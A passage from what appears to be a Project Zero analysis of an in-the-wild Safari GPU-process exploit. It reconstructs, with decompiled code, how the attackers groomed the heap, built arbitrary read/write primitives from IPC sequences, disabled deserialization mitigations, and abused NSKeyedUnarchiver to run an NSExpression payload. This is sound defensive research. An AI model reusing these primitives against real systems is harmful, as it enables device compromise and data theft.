They iterate through all 6 of the RemoteBuffer objects in the hope that the groom successfully placed at least one of them directly before a QueueSlab allocation.
This MapAsync IPC sets the RemoteBuffer's m_mappedRange->source field to point at the very end (hopefully at a QueueSlab).

### IPC 2 - Unmap

```c
wrap_remote_buffer_unmap(remote_device_buffer_id_base + m,
    WTF::ObjectIdentifierBase::generateIdentifierInternal_void_::current - 0x88)
```

wrap_remote_buffer_unmap is the wrapper function we've seen snippets of before which calls the Unmap IPC:

```c
void* wrap_remote_buffer_unmap(int64 dst, int64 arg)
{
    int64 b[5];
    b[0] = 0x7F6F3229LL;
    b[1] = 0LL;
    b[2] = 0LL;
    b[3] = 0xFFFFLL;
    b[4] = arg;
    return IPC_RemoteBuffer_Unmap(dst, b, 40LL);
}
```

The arg value passed to wrap_remote_buffer_unmap (which is the base target address for the overwrite in the next step) is (WTF::ObjectIdentifierBase::generateIdentifierInternal_void_::current - 0x88), a symbol which was linked by the JS find-and-replace on the Mach-O; it points to the global variable used here:

```cpp
int64 WTF::ObjectIdentifierBase::generateIdentifierInternal()
{
    return ++WTF::ObjectIdentifierBase::generateIdentifierInternal(void)::current;
}
```

As the name suggests, this is used to generate unique ids using a monotonically-increasing counter (there is a level of locking above this function).
The value passed in the Unmap IPC points 0x88 bytes below the address of ::current.

[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAww3z050R_dVijQpVdfLcavJy3a5fGpg6kDk71PjQW4okhHen7EdNUndSHT9Qxq_OAzC71ZMSGBbI-BmxX8p-6keXghnEPSLAGGdOCRL27fgLLgF0GjM0YtFbQro87p1HMuZvJ3sns87tRYRWbhGWFlLNxK11xcnfp6aKRtlmgXBlu_0jEoynRm1q0Ys/s548/image3.png>)

If the groom works, this has the effect of corrupting a QueueSlab's inline buffer pointer with a pointer to 0x88 bytes below the counter used by the GPU process to allocate new identifiers.

### IPC 3 - DrawNativeImage

```c
for ( n = 0; n < 0x22; ++n ) {
    if (n == 2 || n == 4 || n == 6 || n == 8 || n == 10 || n == 12) {
        continue;
    }
    IPC_RemoteDisplayListRecorder_DrawNativeImage(
        image_buffer_base_id + n,     // potentially corrupted target
        image_buffer_base_id + 34LL);
```

The exploit then iterates through all the ImageBuffer objects (skipping those which were released to make gaps for the RemoteBuffers) and passes each in turn as the first argument to IPC_RemoteDisplayListRecorder_DrawNativeImage. The hope is that one of them had its associated QueueSlab structure corrupted.
The second argument passed to DrawNativeImage is the ImageBuffer which had CacheNativeImage called on it earlier.

Let's follow the implementation of DrawNativeImage on the GPU process side to see what happens with the corrupted QueueSlab associated with that first ImageBuffer:

```cpp
void RemoteDisplayListRecorder::drawNativeImage(
    RenderingResourceIdentifier imageIdentifier,
    const FloatSize& imageSize,
    const FloatRect& destRect,
    const FloatRect& srcRect,
    const ImagePaintingOptions& options)
{
    drawNativeImageWithQualifiedIdentifier(
        {imageIdentifier, m_webProcessIdentifier},
        imageSize,
        destRect,
        srcRect,
        options);
}
```

This immediately calls through to:

```cpp
void
RemoteDisplayListRecorder::drawNativeImageWithQualifiedIdentifier(
    QualifiedRenderingResourceIdentifier imageIdentifier,
    const FloatSize& imageSize,
    const FloatRect& destRect,
    const FloatRect& srcRect,
    const ImagePaintingOptions& options)
{
    RefPtr image = resourceCache().cachedNativeImage(imageIdentifier);
    if (!image) {
        ASSERT_NOT_REACHED();
        return;
    }

    handleItem(DisplayList::DrawNativeImage(
        imageIdentifier.object(),
        imageSize,
        destRect,
        srcRect,
        options),
        *image);
}
```

imageIdentifier here corresponds to the ID of the ImageBuffer which was passed to CacheNativeImage earlier.
Looking briefly at the implementation of CacheNativeImage we can see that it allocates a NativeImage object (which is what ends up being returned by the call to cachedNativeImage above):

```cpp
void
RemoteRenderingBackend::cacheNativeImage(
    const ShareableBitmap::Handle& handle,
    RenderingResourceIdentifier nativeImageResourceIdentifier)
{
    cacheNativeImageWithQualifiedIdentifier(
        handle,
        {nativeImageResourceIdentifier,
         m_gpuConnectionToWebProcess->webProcessIdentifier()}
    );
}

void
RemoteRenderingBackend::cacheNativeImageWithQualifiedIdentifier(
    const ShareableBitmap::Handle& handle,
    QualifiedRenderingResourceIdentifier nativeImageResourceIdentifier)
{
    auto bitmap = ShareableBitmap::create(handle);
    if (!bitmap)
        return;

    auto image = NativeImage::create(
        bitmap->createPlatformImage(
            DontCopyBackingStore,
            ShouldInterpolate::Yes),
        nativeImageResourceIdentifier.object());
    if (!image)
        return;

    m_remoteResourceCache.cacheNativeImage(
        image.releaseNonNull(),
        nativeImageResourceIdentifier);
}
```

This NativeImage object is allocated by the default system malloc.

Returning to the DrawNativeImage flow we reach this:

```cpp
void DrawNativeImage::apply(GraphicsContext& context, NativeImage& image) const
{
    context.drawNativeImage(image, m_imageSize, m_destinationRect, m_srcRect, m_options);
}
```

The context object is a GraphicsContextCG, a wrapper around a system CoreGraphics CGContext object:

```cpp
void GraphicsContextCG::drawNativeImage(NativeImage& nativeImage, const FloatSize& imageSize, const FloatRect& destRect, const FloatRect& srcRect, const ImagePaintingOptions& options)
```

This ends up calling:

```cpp
CGContextDrawImage(context, adjustedDestRect, subImage.get());
```

which calls CGContextDrawImageWithOptions.

Through a few more levels of indirection in the CoreGraphics library this eventually reaches:

```c
int64 CA::CG::ContextDelegate::draw_image_(
    int64 delegate,
    int64 a2,
    int64 a3,
    CGImage *image...) {
  ...
  alloc_from_slab = CA::CG::Queue::alloc(queue, 160);
  if (alloc_from_slab)
    CA::CG::DrawImage::DrawImage(
      alloc_from_slab,
      Info_2,
      a2,
      a3,
      FillColor_2,
      &v18,
      AlternateImage_0);
```

Via the delegate object the code retrieves the CGContext and from there the Queue with the corrupted QueueSlab. It then makes a 160 byte allocation from the corrupted queue slab:

```c
void*
CA::CG::Queue::alloc(CA::CG::Queue *q, __int64 size)
{
  uint64_t *buffer;
  ...
  size_rounded = (size + 31) & 0xFFFFFFFFFFFFFFF0LL;
  current_slab = q->current_slab;
  if ( !current_slab )
    goto alloc_slab;
  if ( !q->c || current_slab->remaining_size >= size_rounded )
    goto GOT_ENOUGH_SPACE;
  ...
GOT_ENOUGH_SPACE:
  remaining_size = current_slab->remaining_size;
  new_remaining = remaining_size - size_rounded;
  if ( remaining_size >= size_rounded )
  {
    buffer = current_slab->end;
    current_slab->remaining_size = new_remaining;
    current_slab->end = buffer + size_rounded;
    goto RETURN_ALLOC;
  ...
RETURN_ALLOC:
  buffer[0] = size_rounded;
  atomic_fetch_add(q->alloc_meta);
  buffer[1] = q->alloc_meta;
  ...
  return &buffer[2];
}
```

When CA::CG::Queue::alloc attempts to allocate from the corrupted QueueSlab, it sees that the slab claims to have 0xffff bytes of free space remaining, so it proceeds to write a 0x10 byte header into the buffer by following the end pointer, then returns that end pointer plus 0x10.
This has the effect of returning a value which points 0x78 bytes below the WTF::ObjectIdentifierBase::generateIdentifierInternal(void)::current global.

draw_image_ then passes this allocation as the first argument to CA::CG::DrawImage::DrawImage (with the cachedImage pointer as the final argument):

```c
int64 CA::CG::DrawImage::DrawImage(
    int64 slab_buf,
    int64 a2,
    int64 a3,
    int64 a4,
    int64 a5,
    OWORD *a6,
    CGImage *img)
{
  ...
  *(int64 *)(slab_buf + 0x78) = CGImageRetain(img);
```

DrawImage writes the pointer to the cachedImage object to +0x78 in the fake slab allocation, which now happens to exactly overlap WTF::ObjectIdentifierBase::generateIdentifierInternal(void)::current. This has the effect of replacing the current value of the ::current monotonic counter with the address of the cached NativeImage object.

### IPC 4 - CreateCDM

The final step in this section is to then call any IPC which causes the GPU process to allocate a new identifier using generateIdentifierInternal:

```c
interesting_identifier = IPC_RemoteCDMFactoryProxy_CreateCDM();
```

If the new identifier is greater than 0x10000 they mask off the lower 4 bits and have successfully disclosed the remote address of the cached NativeImage object.

### Over and over - arbitrary read

The next stage is to build an arbitrary read primitive, this time using 5 IPCs:

 1. MapAsync - sets up the destination pointer for the overflow
 2. Unmap - performs the overflow, corrupting queue metadata
 3. SetCTM - sets up parameters
 4. FillRect - writes the parameters through a controlled pointer
 5. CreateRecorder - returns data read from an arbitrary address

### Arbitrary read IPC 1 & 2: MapAsync/Unmap

MapAsync and Unmap are used to again corrupt the same QueueSlab object, but this time the queue slab buffer pointer is corrupted to point 0x18 bytes below the following symbol:

```
WebCore::MediaRecorderPrivateWriter::mimeType(void)const::$_11::operator() const(void)::impl
```

Specifically, that symbol is the constant StringImpl object for the "audio/mp4" string returned by reference from this function:

```cpp
const String&
MediaRecorderPrivateWriter::mimeType() const {
    static NeverDestroyed<const String>
        audioMP4(MAKE_STATIC_STRING_IMPL("audio/mp4"));
    static NeverDestroyed<const String>
        videoMP4(MAKE_STATIC_STRING_IMPL("video/mp4"));
    return m_hasVideo ? videoMP4 : audioMP4;
}
```

Concretely this is a StringImplShape object with this layout:

```cpp
class STRING_IMPL_ALIGNMENT StringImplShape {
    unsigned m_refCount;
    unsigned m_length;
    union {
        const LChar* m_data8;
        const UChar* m_data16;
        const char* m_data8Char;
        const char16_t* m_data16Char;
    };
    mutable unsigned m_hashAndFlags;
};
```

### Arbitrary read IPC 3: SetCTM

The next IPC is RemoteDisplayListRecorder::SetCTM:

```
messages -> RemoteDisplayListRecorder NotRefCounted Stream {
    ...
    SetCTM(WebCore::AffineTransform ctm) StreamBatched
    ...
```

CTM is the "Current Transform Matrix" and the WebCore::AffineTransform object passed as the argument is a simple struct with 6 double values defining an affine transformation.

The exploit IPC wrapper function takes two arguments in addition to the image buffer id, and from the surrounding context it's clear that they must be a length and pointer for the arbitrary read:

```c
IPC_RemoteDisplayListRecorder_SetCTM(
    candidate_corrupted_target_image_buffer_id,
    (read_this_much << 32) | 0x100,
    read_from_here);
```

The wrapper passes those two 64-bit values as the first two "doubles" in the IPC.
On the receiver side the implementation doesn't do much apart from directly store those affine transform parameters into the CGContext's CGState object:

```cpp
void
setCTM(const WebCore::AffineTransform& transform) final
{
    GraphicsContextCG::setCTM(
        m_inverseImmutableBaseTransform * transform);
}

void
GraphicsContextCG::setCTM(const AffineTransform& transform)
{
    CGContextSetCTM(platformContext(), transform);
    m_data->setCTM(transform);
    m_data->m_userToDeviceTransformKnownToBeIdentity = false;
}
```

Reversing CGContextSetCTM we see that the transform is just stored into a 0x30 byte field at offset +0x18 in the CGContext's CGGState object (at +0x60 in the CGContext):

```asm
188B55CD4 EXPORT _CGContextSetCTM
188B55CD4 MOV X8, X0
188B55CD8 CBZ X0, loc_188B55D0C
188B55CDC LDR W9, [X8,#0x10]
188B55CE0 MOV W10, #'CTXT'
188B55CE8 CMP W9, W10
188B55CEC B.NE loc_188B55D0C
188B55CF0 LDR X8, [X8,#0x60]
188B55CF4 LDP Q0, Q1, [X1]
188B55CF8 LDR Q2, [X1,#0x20]
188B55CFC STUR Q2, [X8,#0x38]
188B55D00 STUR Q1, [X8,#0x28]
188B55D04 STUR Q0, [X8,#0x18]
188B55D08 RET
```

### Arbitrary read IPC 4: FillRect

This IPC takes a similar path to the DrawNativeImage IPC discussed earlier. It allocates a new buffer from the corrupted QueueSlab, with the value returned by CA::CG::Queue::alloc this time pointing 8 bytes below the "audio/mp4" StringImpl.
FillRect eventually reaches this code:

```c
CA::CG::DrawOp::DrawOp(slab_ptr, a1, a3, CGGState, a5, v24);
...
CTM_2 = (_OWORD *)CGGStateGetCTM_2(CGGGState);
v13 = CTM_2[1];
v12 = CTM_2[2];
*(_OWORD *)(slab_ptr + 8) = *CTM_2;
*(_OWORD *)(slab_ptr + 0x18) = v13;
*(_OWORD *)(slab_ptr + 0x28) = v12;
```

...which just directly copies the 6 CTM doubles to offset +8 in the allocation returned by the corrupted QueueSlab, which overlaps completely with the StringImpl, corrupting the string length and buffer pointer.

### Arbitrary read IPC 5: CreateRecorder

```
messages -> RemoteMediaRecorderManager NotRefCounted {
    CreateRecorder(
        WebKit::MediaRecorderIdentifier id,
        bool hasAudio,
        bool hasVideo,
        struct WebCore::MediaRecorderPrivateOptions options)
    ->
    ( std::optional<WebCore::ExceptionData> creationError,
      String mimeType,
      unsigned audioBitRate,
      unsigned videoBitRate)
    ReleaseRecorder(WebKit::MediaRecorderIdentifier id)
}
```

The CreateRecorder IPC returns, among other things, the contents of the mimeType String which FillRect corrupted to point to an arbitrary location, yielding the arbitrary read primitive.

### What to read?

Recall that the cacheNativeImage operation was sandwiched between two batches of 200 RemoteBuffer allocations (400 in total) made via the RemoteDevice::CreateBuffer IPC.

Note that earlier (for the MapAsync/Unmap corruption) it was the backing buffer pages of the RemoteBuffer which were the groom target - that's not the case for the memory disclosure. The target is instead the AGXG15FamilyBuffer object, which is the wrapper object which points to those backing pages. These are also allocated during the RemoteDevice::CreateBuffer IPC calls. Crucially, these wrapper objects are allocated by the default malloc implementation, which is malloc_zone_malloc using the default ("scalable") zone.
[@elvanderb](<https://twitter.com/elvanderb>) covered the operation of this heap allocator in their ["Heapple Pie" presentation](<https://www.synacktiv.com/ressources/Sthack_2018_Heapple_Pie.pdf>). Provided that the targeted allocation size's freelist is empty, this zone will allocate upwards, making it likely that the NativeImage and AGXG15FamilyBuffer objects will be near each other in virtual memory.

They use the arbitrary read primitive to read 3 pages of data from the GPU process, starting from the address of the cached NativeImage, and search for an Objective-C isa pointer referencing the AGXG15FamilyBuffer class (masking out any PAC bits):

```c
for ( ii = 0; ii < 0x1800; ++ii ) {
  if ( ((leaker_buffer_contents[ii] >> 8) & 0xFFFFFFFF0LL) ==
       (AGXMetalG15::_OBJC_CLASS___AGXG15FamilyBuffer & 0xFFFFFFFF0LL) )
  ...
```

### What to write?

If the search is successful they now know the absolute address of one of the AGXG15FamilyBuffer objects - but at this point they don't know which of the RemoteBuffer objects it corresponds to.

They use the same Map/Unmap/SetCTM/FillRect IPCs as in the setup for the arbitrary read to write the address of WTF::ObjectIdentifierBase::generateIdentifierInternal_void_::current (the monotonic unique id counter seen earlier) into the field at +0x98 of the AGXG15FamilyBuffer.

Looking at the class hierarchy of AGXG15FamilyBuffer (AGXG15FamilyBuffer : AGXBuffer : IOGPUMetalBuffer : IOGPUMetalResource : _MTLResource : _MTLObjectWithLabel : NSObject) we find that +0x98 is the virtualAddress property of IOGPUMetalResource.

```objc
@interface IOGPUMetalResource : _MTLResource <MTLResourceSPI> {
    IOGPUMetalResource* _res;
    IOGPUMetalResource* next;
    IOGPUMetalResource* prev;
    unsigned long long uniqueId;
}
@property (readonly) _IOGPUResource* resourceRef;
@property (nonatomic,readonly) void* virtualAddress;
@property (nonatomic,readonly) unsigned long long gpuAddress;
@property (nonatomic,readonly) unsigned resourceID;
@property (nonatomic,readonly) unsigned long long resourceSize;
@property (readonly) unsigned long long cpuCacheMode;
```

I mentioned earlier that the destination pointer for the MapAsync/Unmap bad memcpy was calculated from a buffer property called contents, not virtualAddress:

```cpp
return static_cast<char*>(m_buffer.contents) + offset;
```

Dot syntax in Objective-C is syntactic sugar around calling an accessor method, and the contents accessor directly calls the virtualAddress accessor, which returns the virtualAddress field:

```asm
void* -[IOGPUMetalBuffer contents]
    B _objc_msgSend$virtualAddress_1

[IOGPUMetalResource virtualAddress]
    ADRP X8, #_OBJC_IVAR_$_IOGPUMetalResource._res@PAGE
    LDRSW X8, [X8,#_OBJC_IVAR_$_IOGPUMetalResource._res@PAGEOFF] ; 0x18
    ADD X8, X0, X8
    LDR X0, [X8,#0x80]
    RET
```

They then loop through each of the candidate RemoteBuffer objects, mapping the beginning then unmapping with an 8 byte buffer, causing a write of a sentinel value through the potentially corrupted IOGPUMetalResource::virtualAddress field:

```c
for ( jj = 200; jj < 400; ++jj )
{
  sentinel = 0x3A30DD9DLL;
  IPC_RemoteBuffer_MapAsync(remote_device_after_base_id + jj, 0LL, 0LL);
  IPC_RemoteBuffer_Unmap(remote_device_after_base_id + jj, &sentinel, 8LL);
  semaphore_signal(semaphore_a);
  CDM = IPC_RemoteCDMFactoryProxy_CreateCDM();
  if ( CDM >= 0x3A30DD9E && CDM <= 0x3A30DF65 ) {
  ...
```

After each write they request a new CDM and look to see whether they got a resource ID near the sentinel value they set - if so then they've found a RemoteBuffer whose virtual address they can completely control!

They store this id and use it to build their final arbitrary write primitive with 6 IPCs:

```c
arbitrary_write(u64 ptr, u64 value_ptr, u64 size) {
  IPC_RemoteBuffer_MapAsync(
    remote_device_buffer_id_base + index_of_corruptor,
    0x4000LL, 0LL);
  wrap_remote_buffer_unmap(
    remote_device_buffer_id_base + index_of_corruptor,
    agxg15familybuffer_plus_0x80);
  IPC_RemoteDisplayListRecorder_SetCTM(
    candidate_corrupted_target_image_buffer_id,
    ptr,
    0LL);
  IPC_RemoteDisplayListRecorder_FillRect(
    candidate_corrupted_target_image_buffer_id);
  IPC_RemoteBuffer_MapAsync(
    device_id_with_corrupted_backing_buffer_ptr, 0LL, 0LL);
  IPC_RemoteBuffer_Unmap(
    device_id_with_corrupted_backing_buffer_ptr, value_ptr, size);
}
```

The first MapAsync/Unmap pair corrupts the original QueueSlab to point the buffer pointer to 0x18 bytes below the address of the virtualAddress field of an AGXG15FamilyBuffer.

SetCTM and FillRect then cause the arbitrary write target pointer value to be written through the corrupted QueueSlab allocation to replace the AGXG15FamilyBuffer's virtualAddress member.

The final MapAsync/Unmap pair then writes through that corrupted virtualAddress field, yielding an arbitrary write primitive which won't corrupt any surrounding memory.

### Mitigating mitigations

At this point the attackers have an arbitrary read/write primitive - it's surely game over. But nevertheless, the most fascinating parts of this exploit are still to come.

Remember, they are seeking not just to exploit this vulnerability; they are really seeking to minimize the overall cost of successfully exploiting as many full exploit chains as possible with the lowest marginal cost. This is typically done using custom frameworks which permit code-reuse across exploits.
In this case the goal is to use some resources (IOKit userclients) which only the GPU Process has access to, but this is done in a very generic way using a custom framework requiring only a few arbitrary writes to kick off.

* * *

### What's old is new again - NSArchiver

The [FORCEDENTRY sandbox escape exploit](<https://googleprojectzero.blogspot.com/2022/03/forcedentry-sandbox-escape.html>) which I wrote about last year used a logic flaw to enable the evaluation of an NSExpression across a sandbox boundary. If you're unfamiliar with NSExpression exploitation I'd recommend reading that post first.

As part of the fix for that issue [Apple introduced various hardening measures](<https://developer.apple.com/documentation/ios-ipados-release-notes/ios-ipados-15_1-release-notes>) intended to restrict both the computational power of NSExpressions as well as the particular avenue used to cause the evaluation of an NSExpression during object deserialization.

The functionality was never actually removed though. Instead, it was deprecated and gated behind various flags. This likely did lock down the attack surface from certain perspectives; but with a sufficiently powerful initial primitive (like an arbitrary read/write) those flags can simply be flipped and the full power of NSExpression-based scripting can be regained. And that's exactly what this exploit continues on to do...

### Flipping bits

Using the arbitrary read/write they flip the globals used in places like __NSCoderEnforceFirstPartySecurityRules to disable various security checks.

They also swap around the implementation class of NSSharedKeySet to be PrototypeTools::_OBJC_CLASS___PTModule and swap the NSKeyPathSpecifierExpression and NSFunctionExpression classRefs to point to each other.

### Forcing Entry

We've seen throughout this writeup that Safari has its own IPC mechanism with custom serialization - it's not using XPC or MIG or protobuf or Mojo or any of the dozens of other serialization options. But is it the case that everything gets serialized with their custom code?

As we observed in the ForcedEntry writeup, it's often just one tiny, innocuous line of code which ends up opening up an enormous extra attack surface. In ForcedEntry it was a seemingly simple attempt to edit the loop count of a GIF. Here, there's another simple piece of code which opens up a potentially unexpected huge extra attack surface: NSKeyedArchiver. It turns out you can get NSKeyedArchiver objects serialized and deserialized across a Safari IPC boundary, specifically using this IPC:

```
RedirectReceived(
    WebKit::RemoteMediaResourceIdentifier identifier,
    WebCore::ResourceRequest request,
    WebCore::ResourceResponse response)
->
    (WebCore::ResourceRequest returnRequest)
```

This IPC takes two arguments:

```
WebCore::ResourceRequest request
WebCore::ResourceResponse response
```

Let's look at the ResourceRequest deserialization code:

```cpp
bool
ArgumentCoder<ResourceRequest>::decode(
    Decoder& decoder,
    ResourceRequest& resourceRequest)
{
    bool hasPlatformData;
    if (!decoder.decode(hasPlatformData))
        return false;

    bool decodeSuccess =
        hasPlatformData ?
            decodePlatformData(decoder, resourceRequest)
        :
            resourceRequest.decodeWithoutPlatformData(decoder);
```

That in turn calls:

```cpp
bool
ArgumentCoder<WebCore::ResourceRequest>::decodePlatformData(
    Decoder& decoder,
    WebCore::ResourceRequest& resourceRequest)
{
    bool requestIsPresent;
    if (!decoder.decode(requestIsPresent))
        return false;

    if (!requestIsPresent) {
        resourceRequest = WebCore::ResourceRequest();
        return true;
    }

    auto request = IPC::decode<NSURLRequest>(
        decoder, NSURLRequest.class);
```

That last line decoding request looks slightly different to the others - rather than calling decoder.decode() passing the field to decode by reference, they're explicitly typing the field here in the template invocation, which takes a different decoder path:

```cpp
template<typename T, typename>
std::optional<RetainPtr<T>> decode(
    Decoder& decoder, Class allowedClass)
{
    return decode<T>(decoder, allowedClass ?
        @[ allowedClass ] : @[ ]);
}
```

(note the @[] syntax defines an Objective-C array literal so this is creating an array with a single entry)

This then calls:

```cpp
template<typename T, typename>
std::optional<RetainPtr<T>> decode(
    Decoder& decoder, NSArray<Class> *allowedClasses)
{
    auto result = decodeObject(decoder, allowedClasses);
    if (!result)
        return std::nullopt;

    ASSERT(!*result ||
           isObjectClassAllowed((*result).get(), allowedClasses));
    return { *result };
}
```

This continues on to a different argument decoder implementation than the one we've seen so far:

```cpp
std::optional<RetainPtr<id>>
decodeObject(
    Decoder& decoder,
    NSArray<Class> *allowedClasses)
{
    bool isNull;
    if (!decoder.decode(isNull))
        return std::nullopt;

    if (isNull)
        return { nullptr };

    NSType type;
    if (!decoder.decode(type))
        return std::nullopt;
```

In this case, rather than knowing the type to decode upfront, they decode a type dword from the message and choose a deserializer not based on what type they expect, but what type the message claims to contain:

```cpp
    switch (type) {
    case NSType::Array:
        return decodeArrayInternal(decoder, allowedClasses);
    case NSType::Color:
        return decodeColorInternal(decoder);
    case NSType::Dictionary:
        return decodeDictionaryInternal(decoder, allowedClasses);
    case NSType::Font:
        return decodeFontInternal(decoder);
    case NSType::Number:
        return decodeNumberInternal(decoder);
    case NSType::SecureCoding:
        return decodeSecureCodingInternal(decoder, allowedClasses);
    case NSType::String:
        return decodeStringInternal(decoder);
    case NSType::Date:
        return decodeDateInternal(decoder);
    case NSType::Data:
        return decodeDataInternal(decoder);
    case NSType::URL:
        return decodeURLInternal(decoder);
    case NSType::CF:
        return decodeCFInternal(decoder);
    case NSType::Unknown:
        break;
    }
```

In this case they choose type 7, which corresponds to NSType::SecureCoding, decoded by calling decodeSecureCodingInternal which allocates an NSKeyedUnarchiver initialized with data from the IPC message:

```objc
auto unarchiver =
    adoptNS([[NSKeyedUnarchiver alloc]
                initForReadingFromData:
                    bridge_cast(data.get()) error:nullptr]);
```

The code adds a few more classes to the allow-list to be decoded:

```objc
auto allowedClassSet =
    adoptNS([[NSMutableSet alloc] initWithArray:allowedClasses]);
[allowedClassSet addObject:WKSecureCodingURLWrapper.class];
[allowedClassSet addObject:WKSecureCodingCGColorWrapper.class];

if ([allowedClasses containsObject:NSAttributedString.class]) {
    [allowedClassSet
        unionSet:NSAttributedString.allowedSecureCodingClasses];
}
```

then unarchives the object:

```objc
id result =
    [unarchiver decodeObjectOfClasses:
                    allowedClassSet.get()
                forKey:
                    NSKeyedArchiveRootObjectKey];
```

The serialized root object sent by the attackers is a WKSecureCodingURLWrapper. Deserialization of this is allowed because it was explicitly added to the allow-list above. Here's the WKSecureCodingURLWrapper::initWithCoder implementation:

```objc
- (instancetype)initWithCoder:(NSCoder *)coder
{
    auto selfPtr = adoptNS([super initWithString:@""]);
    if (!selfPtr)
        return nil;

    BOOL hasBaseURL;
    [coder decodeValueOfObjCType:"c"
                              at:&hasBaseURL
                            size:sizeof(hasBaseURL)];

    RetainPtr<NSURL> baseURL;
    if (hasBaseURL)
        baseURL =
            (NSURL *)[coder decodeObjectOfClass:NSURL.class
                                         forKey:baseURLKey];
...
}
```

This in turn decodes an NSURL, which decodes an NSString member named "NS.relative". The attacker's object supplies a subclass of NSString, _NSLocalizedString, which sets up the following allow-list:

```c
v10 = objc_opt_class_385(&OBJC_CLASS___NSDictionary);
v11 = objc_opt_class_385(&OBJC_CLASS___NSArray);
v12 = objc_opt_class_385(&OBJC_CLASS___NSNumber);
v13 = objc_opt_class_385(&OBJC_CLASS___NSString);
v14 = objc_opt_class_385(&OBJC_CLASS___NSDate);
v15 = objc_opt_class_385(&OBJC_CLASS___NSData);
v17 = objc_msgSend_setWithObjects__0(&OBJC_CLASS___NSSet, v16, v10, v11, v12, v13, v14, v15, 0LL);
v20 = objc_msgSend_decodeObjectOfClasses_forKey__0(a3, v18, v17, CFSTR("NS.configDict"));
```

They then deserialize an NSSharedKeyDictionary (which is a subclass of NSDictionary):

```c
-[NSSharedKeyDictionary initWithCoder:]
...
v6 = objc_opt_class_388(&OBJC_CLASS___NSSharedKeySet);
...
v11 = (__int64)objc_msgSend_decodeObjectOfClass_forKey__4(a3, v8, v6, CFSTR("NS.skkeyset"));
```

NSSharedKeyDictionary then adds NSSharedKeySet to the allow-list and decodes one.

But recall that using the arbitrary write they've swapped the implementation class used by NSSharedKeySet to instead be PrototypeTools::_OBJC_CLASS___PTModule! Which means that initWithCoder is now actually going to be called on a PTModule. And because they also flipped all the relevant security mitigation bits, unarchiving a PTModule will have the same side effect as it did in ForcedEntry of evaluating an NSFunctionExpression. Except rather than a few kilobytes of serialized NSFunctionExpression, this time it's half a megabyte. Things are only getting started!

* * *

### Part II - Data Is All You Need

NSKeyedArchiver objects are serialized as bplist objects. Extracting the bplist out of the exploit binary we can see that it's 437KB! The first thing to do is just run strings to get an idea of what might be going on. There are lots of strings we'd expect to see in a serialized NSFunctionExpression:

```
NSPredicateOperator_
NSRightExpression_
NSLeftExpression
NSComparisonPredicate[NSPredicate
^NSSelectorNameYNSOperand[NSArguments
NSFunctionExpression\NSExpression
NSConstantValue
NSConstantValueExpressionTself
\NSCollection
NSAggregateExpression
```

There are some indications that they might be doing some much more complicated stuff like executing arbitrary syscalls:

```
syscallInvocation
```

manipulating locks:

```
os_unfair_unlock_0x34
%os_unfair_lock_0x34InvocationInstance
```

spinning up threads:

```
.detachNewThreadWithBlock:_NSFunctionExpression
detachNewThreadWithBlock:
!NSThread_detachNewThreadWithBlock
XNSThread
3NSThread_detachNewThreadWithBlockInvocationInstance
6NSThread_detachNewThreadWithBlockInvocationInstanceIMP
pthreadinvocation
pthread____converted
yWpthread
pthread_nextinvocation
pthread_next____converted
```

and sending and receiving mach messages:

```
mach_msg_sendInvocation
mach_msg_receive____converted
mach_make_memory_entryInvocation
mach_make_memory_entry
#mach_make_memory_entryInvocationIMP
```

as well as interacting with IOKit:

```
IOServiceMatchingInvocation
IOServiceMatching
IOServiceMatchingInvocationIMP
```

In addition to these strings there are also three fairly large chunks of javascript source which also look fairly suspicious:

```javascript
var change_scribble=[.1,.1];change_scribble[0]=.2;change_scribble[1]=.3;var scribble_element=[.1];
...
```

### Starting up

[Last time I analysed one of these](<https://googleprojectzero.blogspot.com/2022/03/forcedentry-sandbox-escape.html>) I used plutil to dump out a human-readable form of the bplist. The object was small enough that I was then able to reconstruct the serialized object by hand. This wasn't going to work this time:

```
$ plutil -p bplist_raw | wc -l
58995
```

Here's a random snippet from a few tens of thousands of lines in:

```
14319 => {
  "$class" =>
    <CFKeyedArchiverUID 0x600001b32f60 [0x7ff85d4017d0]>
      {value = 29}
  "NSConstantValue" =>
    <CFKeyedArchiverUID 0x600001b32f40 [0x7ff85d4017d0]>
      {value = 14320}
}
14320 => 2
14321 => {
  "$class" =>
    <CFKeyedArchiverUID 0x600001b32fe0 [0x7ff85d4017d0]>
      {value = 27}
  "NSArguments" =>
    <CFKeyedArchiverUID 0x600001b32fc0 [0x7ff85d4017d0]>
      {value = 14323}
  "NSOperand" =>
    <CFKeyedArchiverUID 0x600001b32fa0 [0x7ff85d4017d0]>
      {value = 14319}
  "NSSelectorName" =>
    <CFKeyedArchiverUID 0x600001b32f80 [0x7ff85d4017d0]>
      {value = 14322}
```

There are a few possible analysis approaches here: I could just deserialize the object using NSKeyedUnarchiver and see what happens (potentially using dtrace to hook interesting places) but I didn't want to just learn what this serialized object does - I want to know how it works.

Another option would be parsing the output of plutil but I figured this was likely almost as much work as parsing the bplist from scratch, so I decided to just write my own bplist and NSArchiver parser and go from there.

This might seem like overdoing it, but with such a huge object it was likely I was going to need to be in the position to manipulate the object quite a lot to figure out how it actually worked.

### bplist

Fortunately, bplist isn't a very complicated serialization format and only takes a hundred or so lines of code to implement. Furthermore, I didn't need to support all the bplist features, just those used in the single serialized object I was investigating.

[This blog post](<https://medium.com/@karaiskc/understanding-apples-binary-property-list-format-281e6da00dbd>) gives a great overview of the format and also links to the [CoreFoundation .c file](<https://opensource.apple.com/source/CF/CF-550/CFBinaryPList.c>) containing a comment defining the format.

A bplist serialized object has 4 sections:

 * header
 * objects
 * offsets
 * trailer

The objects section contains all the serialized objects one after the other. The offsets table contains indexes into the objects section for each object. Compound objects (arrays, sets and dictionaries) can then reference other objects via indexes into the offsets table.

bplist only supports a small number of built-in types:

null, bool, int, real, date, data, ascii string, unicode string, uid, array, set and dictionary

The serialized form of each type is pretty straightforward, and explained clearly in this comment in CFBinaryPlist.c:

```
Object Formats (marker byte followed by additional info in some cases)
null    0000 0000
bool    0000 1000           // false
bool    0000 1001           // true
fill    0000 1111           // fill byte
int     0001 nnnn   ...     // # of bytes is 2^nnnn, big-endian bytes
real    0010 nnnn   ...     // # of bytes is 2^nnnn, big-endian bytes
date    0011 0011   ...     // 8 byte float follows, big-endian bytes
data    0100 nnnn   [int]   ... // nnnn is number of bytes unless 1111 then int count follows, followed by bytes
string  0101 nnnn   [int]   ... // ASCII string, nnnn is # of chars, else 1111 then int count, then bytes
string  0110 nnnn   [int]   ... // Unicode string, nnnn is # of chars, else 1111 then int count, then big-endian 2-byte uint16_t
        0111 xxxx           // unused
